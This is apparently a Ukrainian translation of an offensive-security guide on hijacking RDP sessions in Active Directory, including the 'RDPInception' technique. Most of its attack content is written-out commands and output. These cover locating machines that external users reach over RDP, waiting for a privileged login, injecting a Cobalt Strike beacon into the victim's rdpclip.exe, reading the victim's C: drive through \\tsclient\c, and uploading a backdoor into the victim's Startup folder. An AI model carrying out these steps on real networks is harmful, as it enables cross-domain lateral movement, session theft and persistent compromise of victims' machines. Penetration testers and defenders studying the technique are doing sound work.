Якщо зовнішня група має доступ RDP до будь-якого комп'ютера в поточному домені, зловмисник може зламати цей комп'ютер і чекати на нього.
Як тільки цей користувач отримав доступ через RDP, зловмисник може перейти до сесії цього користувача і зловживати його правами в зовнішньому домені.
# Supposing the group "External Users" has RDP access in the current domain## lets find where they could access## The easiest way would be with bloodhound, but you could also run:Get-DomainGPOUserLocalGroupMapping -Identity "External Users" -LocalGroup "Remote Desktop Users" | select -expand ComputerName
#orFind-DomainLocalGroupMember-GroupName "Remote Desktop Users"| select -expand ComputerName# Then, compromise the listed machines, and wait til someone from the external domain logs in:net logonsLogged on users at \\localhost:EXT\super.admin# With cobalt strike you could just inject a beacon inside of the RDP processbeacon> psPID PPID Name Arch Session User---------------------------...49601012rdpclip.exe x64 3 EXT\super.adminbeacon> inject 4960 x64 tcp-local## From that beacon you can just run powerview modules interacting with the external domain as that user
Перевірте інші способи вкрасти сесії з іншими інструментамина цій сторінці.
RDPInception
Якщо користувач отримує доступ через RDP до машини, де зловмисникчекає на нього, зловмисник зможе впровадити маяк у RDP-сесію користувача, і якщо жертва підключила свій диск під час доступу через RDP, зловмисник зможе отримати до нього доступ.
У цьому випадку ви можете просто зламатиоригінальний комп'ютер жертви, написавши бекдор у папці автозавантаження.
# Wait til someone logs in:net logonsLogged on users at \\localhost:EXT\super.admin# With cobalt strike you could just inject a beacon inside of the RDP processbeacon> psPID PPID Name Arch Session User---------------------------...49601012rdpclip.exe x64 3 EXT\super.adminbeacon> inject 4960 x64 tcp-local# There's a UNC path called tsclient which has a mount point for every drive that is being shared over RDP.## \\tsclient\c is the C: drive on the origin machine of the RDP sessionbeacon> ls \\tsclient\cSize Type Last Modified Name-------------------------dir 02/10/202104:11:30 $Recycle.Bindir 02/10/202103:23:44 Bootdir 02/20/202110:15:23 Config.Msidir 10/18/201601:59:39 Documents and Settings[...]# Upload backdoor to startup folderbeacon> cd \\tsclient\c\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startupbeacon> upload C:\Payloads\pivot.exe